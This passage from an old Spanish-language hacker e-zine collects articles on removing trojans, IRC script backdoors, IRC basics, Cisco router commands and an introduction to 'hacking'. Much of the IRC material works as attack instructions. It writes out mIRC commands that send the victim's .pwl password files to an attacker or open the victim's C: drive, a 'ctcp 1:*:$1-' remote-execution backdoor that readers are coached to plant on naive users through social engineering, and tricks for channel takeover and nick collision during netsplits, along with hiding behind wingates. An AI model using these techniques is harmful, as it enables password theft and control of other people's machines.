(espacio).exe pero solo debes borrar el de la carpeta RunServices o otras
en las que pueda estar y sepas que es la que carga el troyano).
        Con todo esto hemos conseguido que la proxima vez que iniciemos el
ventanucos no se cargue en memoria el troyano, con lo que ya podras ir al
directorio :windows\system y borrar el archivo (espacio).exe (no lo vuelvas
a ejecutar o se te metera otra vez en el registro). Y por fin te has librado
del troyano.

Existen programas que dicen borrar este troyano,pero ES MENTIRA la mayoria
(si no todos)llevan alguna clase de virus dentro,osea que cambiaras este 
virus por otro,por lo que no habras logrado mucho :(
         

      SCRIPTS.
-------------------

Para alguien que sepa scripting le puede resultar muy sencillo controlar tu maquina
de forma remota atraves del irc,ya que en algo que puede resultar tan inocente
como una opcion para mandar un privado,puede esconder algun comando para que si
el esta conectado automaticamente le mandes tu preciado archivo de contraseas o lo
que se le venga en gana en ese momento.
Te recomendamos que pilles algun manual de scripting (en INet los hay a patadas)
te lo empolles y revises el codigo del script que usas abitualmente,no sea que 
resulte que cada vez que pides la lista de canales del servidor donde estes
estes mandando un archivo a una persona que no quieres que lo tenga.
Procura buscar comandos como los siguientes:

/send c:\windows\*.pwl cualquier_nick_que_haya_puesto

/fserve nick_que_haya_puesto 5 c:

o cosas de este estilo que te puedan parecer sospechosas.
Estos comandos pueden estar puestos de la siguiente manera
Ejemplos:

pidiendo la lista de canales:
/list /send c:\windows\*.pwl nick_al_que_llegara_el_archivo

entrando a un canal:
/join #$$?="Entrar en el canal?" /fserve nick_al_que_daras_acceso 5 c:

recibiendo un texto (si ponen una determinada frase/palabra en un canal o privado)
on *:TEXT:!mandameloya*:#:/dcc send archivo_que_quiera_que_le_llegue $nick " $+ %file $+ " 
| /inc %fsendp | ignore -tacu5 $wildsite 

Como puedes ver,estos comandos remotos pueden estar en cualquier sitio del script,
para localizarlos lo mas eficiente es buscarlos en la opcion de STATUS,MENUBAR y REMOTE
ya que es hay donde suele aver mas cantidad de comandos y es donde es mas dificil de 
encontrar el comando remoto que hace que lo pases tan mal cuando estas conectado al irc


    VIRUS DE IRC.
--------------------

Si ya sabemos que esto esta + visto que el tebeo,pero es otra manera +
nunca se te ha ocurrido investigar estos famosos "virus"?
pues a mi si,fijate  :o)

Si investigas un poco dentro del "script.ini" veras que lo que hace es lo siguiente:
esta configurado para que cada vez que entres a un canal le mandes a todos los que
estan dentro de ese canal el fichero "script.ini" pero y si reconfiguramos el 
"script.ini" para que en vez de mandarselo a todo el canal solo le mande a una
persona en concreto el famoso "pwl"?
esto no es muy dificil de hacer si revisas el codigo del "script.ini" y cambias unos
pocos parametros (hay que saber algo de scripting).

En el caso del "dmsetup.exe" es algo mas peculiar.
El archivo en cuestion es un binario (un ejecutable),por lo tanto tendras que saber
programar en el lenguaje que esta echo para poder modificarlo a tu gusto.
Detodas maneras el "virus" sin modificar ya es una jodienda de por si,lo que hace
es lo siguiente:

tiene la particularidad de ser "autoejecutable" osea que no hace falta que lo 
clikees tu para que este se instale en tu maquina :(
Modifica algunas lineas del script.ini para que se autoenvie (igual que el "script.ini")
Algunas de las versiones estudiadas actuan con mas particularidad e incluyen
pautas para desconectar a un usuario si recibe la frase "tis to I who seem so sad"
(sin comillas claro).

Crea copias de si mismo en los directorios c:\windows y c:\mirc (precavido el jeje)
Intenta sobreescribir el autoexec.bat para restaurar copias de si mismo cada vez que 
se reinicie la computadora y por si eso fuera poco encima cambia los directorios de
los fserve por c:\mirc lo que puede ser una putada si guardas logs con contraseas
o algo asi en alguno de los subdiretorios de esta carpeta.

Eliminar estos dos archivos es algo relativamente simple:
para el script.ini:

en la linea donde escribes normalmete en el mirc pon lo siguiente: 
"/unload -rs script.ini" (sin las comillas obviamente)
lo que consigues con esto es descargar de la memoria del programa este archivo,pero cuando 
lo vuelvas a utilizar este se volvera a cargar en memoria,para elimirarlo lo que deves 
hacer cuando descarges de la memoria el archivo es lo siguiente:
donde escribes normalente en el mirc escribe esto: "/removescript.ini" (sin las comillas) 
y ya estara borrado el "virus"
Para el "dmsetup.exe" la cosa cambia un poco:
Cierra todos los programas  que tengas abiertos,localiza todos los dmsetup.exe que tengas 
en tu sistema (con la opcion de buscar del menu "inicio" te sera muy facil) y borralos 
todos,revisa los ficheros "config.sys" y "autoexec.bat" y si tienes dudas sobre alguna 
linea,sustituye ambos por copias de seguridad.
Que no tienes una copia de seguridad?pero en que estabas pensando cuando el win2 te dijo 
que era recomendable hacer un disco de arranque?
Luego reinicia el equipo y reinstala el mirc,si sigues sufriendo anomalias a la hora hacer 
funcionar este programa reinstala el win2 (hazlo encima del que tienes,no hace falta formatear)


  ATRAVES DE LA LINEA DE COMANDOS.
---------------------------------------

Para esto es necesario que usen ingeniaria social con tigo (no te vamos a explicar lo
que es la ingenieria social por que es algo sobradamente conocido).

Existen una serie de comandos que si los introduces en donde normalmente escribes puedes
dejar que el otro controle tu programa del Mirc o que le des acceso a tu c:\ pudiendo 
hacer los que le venga en gana con el.

/fserve su_nick 5 c:

/fserve= comando para abrirle una sesion de server al otro usuario
su_nick= aqui se pone el nick de la otra persona
5= cantidad de ficheros que puede bajar
c:= directorio a partir del que le das acceso 

Este comando lo que hace es dar acceso completo a tu c:\ (o la carpeta que especifiques)
Podra subir,bajar,borrar...ficheros,la unica restriccion que pones es la carpeta
apartir de la que tiene acceso,y el numero de archivos que puede bajar.
Ademas cuando pones este comando te saldra una ventana (en ingles) diciendote lo que
estas haciendo (pero la mayoria de las veces la gente pasa de leerla)

ctcp 1:*:$1-
Este comando, introducido en los ctcps de mIRC, ejecuta cualkier orden 
de forma remota.Es como el antiguo /ctpc nick DO.
ctcp ==> Client-To-Client-Protocol. Los version, ping, etc...
1    ==> nivel de usuario que ejecuta el ctcp.
*    ==> como en DOS, comodin que sustituye al ctcp que nos hagan. Podriamos
definir aqui un VERSION PING, etc..
$1-  ==> con este parametro, mirc toma en consideracion todo lo que nos envien. 

Mu bonito verdad? pero te estaras preguntando y como coe se usa? pos mu simple:
Hemos conseguido que el pavo introduzca este comando y estamos en el canal
#me_mola con el y me apetece que me de OP en este canal,pues ponemos lo siguiente
"/ctcp su_nick mode #me_mola +o nuestro_nick" (sin comillas)
y bingo,ya tenemos op en el canal #me_mola,pero claro el tio dice "coo si yo a este no
le he dado op" y se mosquea osea que este es un buen momento para hacer un "automass deop"
que no sabes como hacerlo? pos en la mayoria de los scripts (un poco modernos)
tienes una opcion para hacerlo, "pero esque yo no uso ningun script"
pero tu en que mundo vives tio? en http://www.welcome.to/100scripts tienes una coleccion de
ellos muy grande,bajate alguno + rapido que inmediatamente :) 
(si es el ZeD-wOrLd-ScRiPt mejor,jeje)
"Bueno pero yo no quiero que me de OP lo que quiero es desconectarle del irc"
Bueno pues en ese caso ponlo siguiente:
"/ctcp nick_del_personaje quit FRASE QUE TE APETEZCA QUE DIGA AL DESCONECTARSE" 
(sin las comillas)
"Y si quiero que diga algo sin que lo escriba?" pues pon esto:
"/ctcp nick_del_personaje say FRASE QUE QUIERES QUE DIGA" (sin las comillas)
Tienes que tener cuidado con esta clase de "ataques" por que al tio en cuestion
se le llenara la ventana de "status" de mensajes diciendole quien sois.
Bueno supongo que el concepto lo habreis pillado puesto que es muy simple. 

Bueno esto es una pequea muestra de como controlar,colarse...etc... atraves de 
algo tan usado como es el irc,pero para muchas de estas cosas tienes que elejir
a alguien que sea un pardillo en esto del irc,pero los hay,valla si los hay ;)

byez


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


[ IRC (GUIA RAPIDA) - Yo_Soy ]


                     <>
                         ۲     I R C                        
                         ۲  GUIA RAPIDA                     
                     <>


  IRC es un metodo de conversacion por Internet, sus siglas significan
  Internet Relay Chat.  Esta conversacion se lleva a cabo generalmente
  mediante un cliente (programa que  se conecta a  un servidor y mismo 
  que presta  un servicio) que se conecta a un servidor , asi nosotros
  como usuarios utilizamos un apodo  (nickname) y  llevamos charlas en
  lugares llamados "canales".


                  C C C C         C C C C         C C C C
                                             
                                             
               Ŀ    Ŀ    Ŀ
                Servidor      Servidor      Servidor 
                 IRC 2   į   IRC 1  ĳ  IRC 3   
                       

  Existen redes IRC,  a los cuales se conecta el programa cliente (C),
  estas  redes  estan  formadas por  varios  servidores. De  entre los
  programas  clientes destacan el mIRC, virc, etc. 

   >[   LOS CANALES   ]<


  Es un grupo de uno o mas clientes, el  canal es creado por un usuario
  al entrar por primera vez, y deja de existir cuando el ultimo usuario
  sale.  Si un  canal no  existe  el  usuario  que  lo  crea recive los
  privilegios de operador del canal.

  Los canales  son  creados  con  un  nombre  el cual se compone de una
  cadena  de  caracteres  y  puede tener una longitud de 200 caracteres,
  pero no es posible el uso de espacios o comas.


 >[ OPERADORES DEL CANAL ]<


  Son los  encargados  del canal  y por  tanto  tienen privilegios para
  cambiar  las  caracteristicas  del mismo, los  reconoceras facilmente
  porque  veras un @ (arroba) al lado de su nombre. Entre las funciones
  de un OP estan:

   Patear a usuarios
   Colocar un Baneo

  Un BAN consiste en impedir que el usuario entre al canal.


  >[  SPLIT  ]<


  Ocurre cuando en la red se separa 1 o mas servidores entre si. Cuando
  esto ocurre, en el canal solo quedan  los conectados a ese respectivo
  servidor en los diferentes lados del split.


                    Ŀ      Ŀ     
                     SERVIDOR 1 <> SERVIDOR 2  
                          

  Para dar  un  idea, cuando  hay un split  los usuarios  conectados al
  servidor  1  ven  desconectarse  a los  usuarios del servidor 2 y los
  usuarios conectados al servidor 2 ven caer a los del 1.

  Nosotros podemos aprovechar esto para 2 cosas (tal vez mas ;) :


   Colision de Nick
   Ganar OP

  Despues del NetSplit  viene el NetJoin que  ocurre cuando el servidor
  separado se une de nuevo a la red.

  >  Colision de Nick:

  En el IRC el nickname es unico, por tanto, no pueden existir 2 con el
  mismo nombre. Si tu tienes el nick de " MENTE ", nadie en toda la red
  puede  usar  ese nick. Digamos  que el usuario "MENTE" entro a la red
  IRC por el Servidor 1, asi  si  hay un  split entre el servidor 1 y 2
  estos se separan, por tanto "MENTE" deja de existir en el Servidor 2,
  mas aun sigue conectado, pero unicamente en el Servidor 1.

  Ahora, supongamos que queremos hacer caer al usuario "MENTE", pero el
  mendigo esta usando su Firewall y no cae :(..

  Creamos un clon y entramos por el Servidor 2 y esperamos.. asi cuando
  haya un NETJOIN (sucede despues del split cuando se unen los servers)
  habra una colision (2 personas estan usando el mismo nick) lo que nos
  trae por consecuencia un KILL a los 2 nicks.


  > Ganar OP

  Sucede cuando hay un split entonces nosotros nos lanzamos al servidor
  que esta separado, creamos el  canal que queremos tomar (por lo tanto
  tendremos op) y esperamos que  se vuelva  a unir. No siempre funciona
  porque si el canal que quieres  tomar tiene un BOT y esta preparado a
  la hora de  hacer la union, puede que te quite el OP. :(...


  >[  WINGATE  ]<


  Una de las cosas mas vistas en el IRC ahora es ver a personas con una
  IP  diferente  a  la que deberian  tener,  pero sin spoofear, esto es
  utilizando  un  Wingate, la  forma mas sencilla si estamos utilizando
  mIRC es ir a Setup -> Firewall -> y  colocar  la IP  del Wingate, asi
  cada  vez  que  entremos a  un  servidor  IRC  lo  usara  como Proxy.
  Un ejemplo de un Wingate es --> dslc00411.adsl.telusplanet.net
  En la pagina de RareGaZz encontraras un escaner de Wingates ;)
  La otra forma de conectarse a Irc por Wingate es:

  /server ip-wingate 23
  /quote irc.server.com 6667
  /quote usuario lo_ke_sea lo_ke_sea mail@kesea.com lo_ke_sea
  /quote nickname lo_ke_sea


  >[  Comandos Generales  ]<


   Cualquier cliente IRC tiene un  lugar para introducir lo que vamos a
   decir , ahi mismo  colocaremos los  comandos.  Los comandos  siempre
   comenzaran con una "/" , aquello  que no  comience  con / se asumira
   que se trata de un mensaje.


   > Comandos Basicos


   /NICK  nuevo_nick
    Cambia  tu  apodo  con  el  cual  seremos  conocido  en  adelante,
    generalmente tiene una longitud no mayor de 9 caracteres.

   /LIST
    Muestra los canales, usuarios y topic de cada uno.

   /NAMES  #canal
    Muestra los usuarios que estan en cierto canal.

   /WHOIS  nickname
    Muestra informacion acerca de alguien.

   /WHOWAS nickname
    Muestra informacion de alguien que acaba de salir.

   /UWHO nickname
    Muesta informacion del usuario.

   /QUIT  mensaje_opcional
    Sale del IRC, puediendo opcionalmente dejar un mensaje de salida.

   /SERVER servidor o i.p
    Se conecta al servidor especificado.
   

   > Comandos de Conversacion


   /JOIN #canal
    Entra al canal especificado.

   /LEAVE #canal
    Sale del canal especificado.

   /MSG nickname texto
    Manda un mensaje privado a un usuario.

   /ME comentario
    Manda un mensaje al canal con un comentario inciando con tu apodo.

   /QUERY nickname
    Comienza una conversacion privada con alguien.

   /DCC CHAT nickname
   /DCC CLOSE CHAT nickname
    Comienza una conversacion directa de cliente a cliente.

   /DCC SEND nickname path_archivo
    Manda un archivo a un usuario.

   /DCC GET nickname
    Abre la conexion para recivir archivos.

   /NOTIFY [+/-] nickname
    Avisa de la prescencia de un usuario en la red.

   /INVITE nickname #canal
    Invita a un usuario a entrar a un canal.

   /IGNORE nickname
    Ignora a cierto usuario.


   > Comandos de Mantenimiento del Canal     (solo OP's)


   /TOPIC #canal mensaje de topico
    Cambia/asigna un mensaje de topico para el canal.


   /MODE #canal [+|-]modo [nickname]
    Cambia los modos del canal, entre ellos los siguientes:

     o - dar/quitar op
     p - canal privado
     s - canal secreto
     i - canal solo para invitados
     t - solos los op pueden cambiar el topic
     n - no permite mensajes externos
     m - canal moderado
     l - limite de usuarios
     k - coloca un password al canal
     v - da/quita voz - permite hablar en un canal moderado
     b - coloca un baneo

   /KICK #canal nickname
    Patea del canal a un usuario.


   > Otros Comandos


   /CTCP nick argumento
    Permite ver algunas caracteristicas del cliente/usuario, entre ellas
    estan:
           /CTCP nick PING      < Manda un Ping
           /CTCP nick VERSION   < Ve la version de su cliente.
           /CTCP nick FINGER    < Trata de hacer un finger.

   /PING nickname
    Manda un Ping a un usuario.

   /DNS [usuario]
    Ve la IP y el DNS de un usuario.

   /WHO cadena
   Muestra informacion acerca de ciertos usuarios, ej.

     /who *telmex.net.mx   < Mostrara los usuarios que
                                 tengan esa cadena


   VOCABULARIO 

  Nickname:  Apodo o sobrenombre con el cual somos conocidos en el IRC.

  K-Line  :  Es cuando se impide la entrada de un usuario a un servidor.

  Bot     :  Robot que se encarga de administrar el canal.

  Lag     :  Retardo por la sobrecarga de informacion en IRC.

  Wingate :  Software utilizado para que 2 o mas sistemas utilizen la
             misma linea, tambien son usados como Proxies.

  PING    :  Acronimo de "Packet Internetwork Groper". Se  utiliza para
             probar si la conexion esta activa o inactiva.

  CTCP    :  Acronimo  de " Client-to-Client  Protocol " ( Protocolo de
             Cliente a Cliente).

  Scripts :  Son aditamentos para  nuestro cliente, los mas famosos son
             para mIRC, si  quieres  tener  una idea de ello, visita la
             siguiente pagina: http://www.arrakis.es/~alcon/scripts.htm


                                                           <=Yo-Soy=>
                                                        varf@bigfoot.com
                                                        <>


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


[ Cisco Routers - GuyBrush ]


Aqui  teneis una  breve descripcion  de los  comandos del Cisco. Espero que si
entrais en alguno, os sirva de algo:


COMANDOS DEL CISCO EN MODO NORMAL
---------------------------------
 <1-99>			Session number to resume
 access-enable		Create a temporary Access-List entry
 clear			Reset functions
 connect		Open a terminal connection
 disable		Turn off privileged commands
 disconnect		Disconnect an existing network connection
 enable			Turn on privileged commands
 exit			Exit from the EXEC
 help			Description of the interactive help system
 lock			Lock the terminal
 login			Log in as a particular user
 logout			Exit from the EXEC
 name-connection	Name an existing network connection
 pad			Open a X.29 PAD connection
 ping			Send echo messages
 ppp			Start IETF Point-To-Point Protocol (PPP)
 resume			Resume an active network connection
 rlogin			Open an rlogin connection
 show			Show running system information
 slip			Start Serial-line IP (SLIP)
 systat			Display information about terminal lines
 telnet			Open a telnet connection
 terminal		Set terminal line parameters
 traceroute		Trace route to destination
 tunnel			Open a tunnel connection
 where			List active connections
 x3			Set X.3 parapeters on PAD


COMANDOS DEL CISCO EN MODO PRIVILEGIADO
---------------------------------------
  <1-99>           Session number to resume
  access-enable    Create a temporary Access-List entry
  access-template  Create a temporary Access-List entry
  bfe              For manual emergency modes setting
  clear            Reset functions
  clock            Manage the system clock
  configure        Enter configuration mode
  connect          Open a terminal connection
  copy             Copy configuration or image data
  debug            Debugging functions (see also 'undebug')
  disable          Turn off privileged commands
  disconnect       Disconnect an existing network connection
  enable           Turn on privileged commands
  erase            Erase flash or configuration memory
  exit             Exit from the EXEC
  help             Description of the interactive help system
  lock             Lock the terminal
  login            Log in as a particular user
  logout           Exit from the EXEC
  name-connection  Name an existing network connection
  no               Disable debugging functions
  pad              Open a X.29 PAD connection
  ping             Send echo messages
  ppp              Start IETF Point-to-Point Protocol (PPP)
  reload           Halt and perform a cold restart
  resume           Resume an active network connection
  rlogin           Open an rlogin connection
  rsh              Execute a remote command
  send             Send a message to other tty lines
  setup            Run the SETUP command facility
  show             Show running system information
  slip             Start Serial-line IP (SLIP)
  start-chat       Start a chat-script on a line
  systat           Display information about terminal lines
  telnet           Open a telnet connection
  terminal         Set terminal line parameters
  test             Test subsystems, memory, and interfaces
  traceroute       Trace route to destination
  tunnel           Open a tunnel connection
  undebug          Disable debugging functions (see also 'debug')
  verify           Verify checksum of a Flash file
  where            List active connections
  write            Write running configuration to memory, network, or terminal
  x3               Set X.3 parameters on PAD


PARAMETROS DEL SHOW EN MODO NORMAL
----------------------------------
 WORD			Flash device information - format <dev:>[partition]
 clock			Display the system clock
 history		Display the session command history
 hosts 			IP domain-name, lookup-style, nameservers, and host table
 isdn			ISDN information
 modemcap		Show Modem Capabilities database
 ppp			PPP parameters and statistics
 sessions		Information about Telnet connections
 snmp			snmp statistics
 terminal		Display terminal configuration parameters
 users			Display information about terminal lines
 version		System hardware and software status


PARAMETROS DEL SHOW EN MODO PRIVILEGIADO
----------------------------------------
  WORD               Flash device information - format <dev:>[partition]
  access-expression  List access expression
  access-lists       List access lists
  accounting         Accounting data for active sessions
  aliases            Display alias commands
  arp                ARP table
  async              Information on terminal lines used as router interfaces
  bridge             Bridge Forwarding/Filtering Database [verbose]
  buffers            Buffer pool statistics
  cdp                CDP information
  clock              Display the system clock
  cmns               Connection-Mode networking services (CMNS) information
  compress           Show compression statistics.
  configuration      Contents of Non-Volatile memory
  controllers        Interface controller status
  debugging          State of each debugging option
  dhcp               Dynamic Host Configuration Protocol status
  dialer             Dialer parameters and statistics
  dnsix              Shows Dnsix/DMDP information
  dxi                atm-dxi information
  entry              Queued terminal entries
  flash              System Flash information
  flh-log            Flash Load Helper log buffer
  frame-relay        Frame-Relay information
  history            Display the session command history
  hosts              IP domain-name, lookup style, nameservers, and host table
  interfaces         Interface status and configuration
  ip                 IP information
  isdn               ISDN information
  key                Key information
  line               TTY line information
  llc2               IBM LLC2 circuit information
  logging            Show the contents of logging buffers
  memory             Memory statistics
  modemcap           Show Modem Capabilities database
  ppp                PPP parameters and statistics
  privilege          Show current privilege level
  processes          Active process statistics
  protocols          Active network routing protocols
  queue              Show queue contents
  queueing           Show queueing configuration
  registry           Function registry information
  reload             Scheduled reload information
  rhosts             Remote-host+user equivalences
  rmon               rmon statistics
  route-map          route-map information
  running-config     Current operating configuration
  sessions           Information about Telnet connections
  smds               SMDS information
  smf                Software MAC filter
  snapshot           Snapshot parameters and statistics
  snmp               snmp statistics
  spanning-tree      Spanning tree topology
  stacks             Process stack utilization
  standby            Hot standby protocol information
  startup-config     Contents of startup configuration
  subsys             Show subsystem information
  tcp                Status of TCP connections
  tech-support       Show system information for Tech-Support
  terminal           Display terminal configuration parameters
  users              Display information about terminal lines
  version            System hardware and software status
  whoami             Info on current tty line
  x25                X.25 information


PARAMETROS DEL DEBUG (SOLO PARA MODO PRIVILEGIADO)
--------------------------------------------------
  aaa                 AAA Authentication, Authorization and Accounting
  access-expression   Boolean access expression
  all                 Enable all debugging
  arp                 IP ARP and HP Probe transactions
  async               Async interface information
  bri-interface       bri network interface events
  broadcast           MAC broadcast packets
  callback            Callback activity
  cdp                 CDP information
  chat                Chat scripts activity
  compress            COMPRESS traffic
  confmodem           Modem configuration database
  custom-queue        Custom output queueing
  dhcp                DHCP client activity
  dialer              Dial on Demand
  dnsix               Dnsix information
  domain              Domain Name System
  dxi                 atm-dxi information
  eigrp               EIGRP Protocol information
  entry               Incoming queue entries
  ethernet-interface  Ethernet network interface events
  frame-relay         Frame Relay
  ip                  IP information
  isdn                ISDN information
  lapb                LAPB protocol transactions
  list                Set interface or/and access list for the next debug
                      command
  llc2                LLC2 type II Information
  modem               Modem control/process activation
  packet              Log unknown packets
  pad                 X25 PAD protocol
  ppp                 PPP (Point to Point Protocol) information
  priority            Priority output queueing
  probe               HP Probe Proxy Requests
  radius              RADIUS protocol
  serial              Serial interface information
  smf                 Software MAC filter
  snapshot            Snapshot activity
  snmp                SNMP information
  spanning            Spanning-tree information
  standby             Hot standby protocol
  tacacs              TACACS authentication and authorization
  tbridge             Transparent Bridging
  telnet              Incoming telnet connections
  tftp                TFTP packets
  tunnel              Generic Tunnel Interface
  x25                 X.25 information


Para  acceder  al  Cisco   debes  hacer   telnet   y   escribir   el  password
correspondiente.  Si entras,  lo  haras en  modo  normal. Para acceder al modo
privilegiado  debes poner 'enable' y te pedira otro password. Si lo superas ya
estaras en modo privilegiado.
Para ver  la ayuda de los comandos debes escribir '?'. Si quieres ver la ayuda
de un comando en concreto, por ejemplo 'debug', deberas escribir 'debug ?'

[ Quiero darle las gracias a Mijail por su gran ayuda en este articulo ]

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


[ Hack basico - Mr. Aztech / " >< TONE " / John ]


Ha pasado ya un largo tiempo desde que aparecio la convocatoria en la lista de
la rare, para formar un nuevo grupo de newbees, pues ya despues de ponernos de
acuerdo  y  organizarnos,  he  aqui  el  primer  fruto de nuestro esfuerzo. La
intencion  de este  grupo  fue ir  aprendiendo  mas y mejor, todos unidos como
grupo  y  entregar  articulos  periodicamente  a  la  Raregazz,  originalmente
respondieron  a mi llamado  13 personas, las cuales fueron aceptadas, pero por
motivos  fuera de mi  control solo  quedamos ocho  personas, bueno  esta es la
primera edicion  de nuestros articulos,  esperemos que  les gusten y cualquier
aclaracion,  duda,  comentario,  etc.  por  favor  dirijanlas a esta direccion
mr_aztech@informaticosmix.com

A  estaba pasando,  tenemos  pensado hacerle  un guequito a todos los mails de
preguntas  o aclaraciones  que  nos lleguen,  para responderlos  y ponerlos en
ediciones  posteriores de  estos  articulos, bueno ahora si vamos a lo que nos
truje, gracias a la rare y en especial a GuyBrush, Acidgum y HuiLo por todo el
apoyo  que dieron  para la elaboracion  de este articulo (Y un bu!! para Conde
Vampiro que ni nos pelo!)

Los  contenidos que  trataremos  de abordar  seran los  siguientes, pero claro
explicados perfectamente y sin tecnisismos, o eso se tratara ;->

        1.1 Que es un Hacker? Definicion                   Mr. Aztech
        1.2 Que es y como se maneja un servidor (General)   Mr. Aztech
        1.3 Comandos Basicos de Unix                        " >< TONE "
        1.4 Que son los Daemons                             John
        1.5 Introduccion a el filtro Vi                     John
        *Hasta aqui llega la primera edicion

Los contenidos de la segunda edicion vendran luego, pero ya estan  confirmados
los siguientes temas:

        2.1 Permisos de los archivos
        2.2 Manual de Filtros

Pos  como ven  hemos  hablado de  todo menos de hacking, bueno esto es por que
primero queremos  sentar bien las bases del hacking para luego entrar de lleno
en esto, posiblemente se empieze en la tercera edicion.

*No  se aceptaran  mas  miembros en el grupo por causas de seguridad interna y
 nacional

Buno  ya despues  de todo  el rollo este, pasamos ya a los primeros articulos,
pero recuerden enviarnos todas sus dudas a nuestro correo para resolverselas y
publicarlas para todos los que tengan la misma duda.

Mr. AZTECh


*****************************************************************************
*****************************************************************************
**********************    QUE ES UN HACKER....? *****************************
**********************    POR MR. AZTECh        *****************************
*****************************************************************************
*****************************************************************************

Bueno,  no voy  a  explicar demasiado  que  es un  hacker, puesto que si estas
buscando  informacion hacker es  por que se supone que sabes quienes son y que
es lo que hacen  (Si viste la pelicula Hackers, olvida todo eso y empezemos de
nuevo).

Un hacker  es una  persona  que tiene  un  conocimiento elevado sobre sistemas
computacionales  en  general,  diganse  redes,  protocolos   de  comunicacion,
sistemas operativos, comunicaciones, telefonia, etc.. Lo que hacen los hackers
es introducirse  a sistemas, mediante  fallos en la configuracion, pero no con
el fin de destrozar el sistema o de sacar provecho de cualquier tipo, el unico
provecho que  un verdadero  hacker puede sacar de los sistemas a los que entra
es el  de elevar sus  conocimientos, las personas que buscan algun provecho al
entrar  a un sistema,  o de  plano solo buscan  destrozarlo se les conoce como
crackers, es por  estas peronas que existen leyes contra delitos informaticos,
puesto  que el  hacker  busca no  dejar huella de su entrada a un sistema, los
unicos  archivos que un  hacker puede modificar son los logs, que son archivos
que guardan  info. De  cada usuario  que se  conecta a un determinado sistema,
pues a grandes rasgos esta es la definicion general de un hacker.

Mr. AZTECh



*****************************************************************************
*****************************************************************************
*******************         QUE ES UN SERVIDOR ?   **************************
*******************             POR MR. AZTECH     **************************
*****************************************************************************
*****************************************************************************

Bueno ahora que ya sabemos que es un hacker, debemos saber que es lo que hace;
basiente se  introduce a sistemas (computadoras) y obtiene superusuario (root)
para tener el  control total del sistema. Antes de todo debemos definir que es
un sistema , un  sistema es una  computadora que esta o no canectada a una red
(internet, LAN, WAN, Intranet, Novel) o a varias redes ( Lo mismo pero  de dos
a mas),  debe tener  la capacidad  de atender  a varios  usuarios a la vez (Un
sistema  puede ser  tu PC,  conectada a internet pero con un sistema Operativo
Multiusuario  (Unix, Linux,  Windows NT))  y  ademas  tiene  la  capacidad  de
realizar varias tareas a la vez, un ejemplo de sistema es el de una pagina web,
puesto que la computadora en que esta guardada la pagina tiene la capacidad de
atender a  varios usuarios que  soliciten esa misma  pagina (Si tu vecino esta
viendo  una pagina,  tu la  puedes ver en otra PC al mismo tiempo, el servidor
atiende a los dos llamados al mismo tiempo.)

Las tareas un sistema (servidor) estan  divididas por puertos. Por ejemplo
el  puerto 25  se dedica exclusivamente  a enviar  mail, esto es comparable al
puerto  de  impresion  de  tu  PC (LTP1)  solo  que  en el caso de servidores,
generalmente son porgramas (software) y no hardware como la Smart Drive que se
encarga de imprimir en tu PC.

Las personas  que tienen  acceso permitido a un sistema se denominan usuarios,
la manera  de como un servidor reconoce quien tiene y quien no tiene permitido
la  entrada a  el,  es mediante  la combinacion de dos palabras, el LOGIN y la
CONTRASENA, esta informacion  en las maquinas con Unix/Linux es guardada en el
archivo /etc/passwd generalmente, aunque varia de version a version.

El hacker  puede  entrar a  un sistema basicamente de dos formas, la primera a
partir  de  una  combinacion  valida  de  LOGIN  y  PASSWDORD  y  la  segunada
aprovechando  errores del  sistema  operativo o configuracion y ganando acceso
sin tener que obtener un LOGIN y PASSWORD.

Hasta  aqui pareceria  facil entrar a algun sistema, pues si conoces a alguien
de ese  sistema le podrias  decir que te mandara el archivo passwd, para tener
todos los logins y passwds, pero no es asi por que el sistema de archivos esta
protegido con el sistema de encripcion DES, este consiste en que el passwd que
se  le asigna  a un  usuario se  encrypta  con  este  sistema,  y  la  palabra
resultante se le encrypta otras 25 veces con este mismo sistema y a la palabra
resultante  y  a  la  palabra  resultante  (mas bien signos) se le agregan dos
caracteres  mas dependiendo  de  la fecha  y  la hora, asi que este proceso es
irreversible (ONE-WAY ENCRYPTION ) asi  que cuando los usuarios dan su login y
password, para entrar a un sistema, este no desencripta la palabra del archivo
passwd, sino  que la palabra  dada por el usuario la encripta y la compara con
la archivada.

Por  ultimo los  usuarios de  un servidor  esta organizados  por grupos (grupo
financiero,  estudiantes, jardineros,  etc), en  un sistema  multiusuario esta
claro que debe haber cierta privacidad  (si yo hago un doc, no me gustaria que
todos  lo vieran),  los usuarios  a su vez se organizan individualmente por su
UID  y por  grupos con  la GID  mientras este  numero sea mayor, mayor sera su
poder en el sistema. Asi el usuario Root (Super ususraio) tendra uid 0 o 1.
UID=User ID
GID=Group ID    

#########################################################################
### Comandos Basicos de Unix {{{{{{{{-------}}}}}}}} por ^[]xt0ne[]^ ###
#########################################################################

Un  sistema operativo  es un  programa ke  se encarga de manejar el hardware y
software  del  PC  a  beneficio  del  usuario.  Los sistemas operativos fueron
diseados para realizar tareas de hardware repetitivas etc etc etc, creo ke ya
han  oido mucho de eso pero keria empezar asi =) de lo ke si les hablare antes
es  de  ke  es  unix  y algo de su historia, sera breve. La historia empieza a
finales  de los  70,  momento en  ke  tuvo  lugar  un proyecto concertado para
desarrollar  nuevas  tecnicas  de  sistemas  operativos.  En  1968 un grupo de
investigadores  de General Electric, AT&T Bell y del Instituto Tecnologico  de
